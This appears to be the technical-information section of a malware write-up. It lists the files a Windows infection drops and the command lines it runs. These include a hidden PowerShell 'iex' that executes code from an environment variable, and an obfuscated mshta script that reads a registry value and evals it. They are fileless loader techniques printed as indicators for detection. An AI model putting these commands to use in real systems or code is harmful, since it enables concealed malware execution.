Technical Information
- %TEMP%\nsv67b8.tmp
- %APPDATA%\bluestonemainsail
- %APPDATA%\entropy.mm
- %APPDATA%\biblioentry.item.separator.xml
- %APPDATA%\tweakrepairwinsock_fi.p5p
- %APPDATA%\toddler.dll
- %APPDATA%\system.dll
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' iex $env:xgowvrq (with hidden window)
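- '<SYSTEM32>\mshta.exe' javascript:bgOR5iVd8W="V";o8N4=new%20ActiveXObject("WScript.Shell");vxsmh7R="RLYnmc53SL";BR7SY=o8N4.RegRead("HKLM\\software\\Wow6432Node\\W3ZOGA0\\sNswp97");L2bbozkF="YU";eval(BR7SY);vf4ulXWb9P... (command line truncated; the visible script reads the registry value HKLM\software\Wow6432Node\W3ZOGA0\sNswp97 through WScript.Shell and passes its contents to eval)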
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' iex $env:xgowvrq
- '%WINDIR%\syswow64\regsvr32.exe'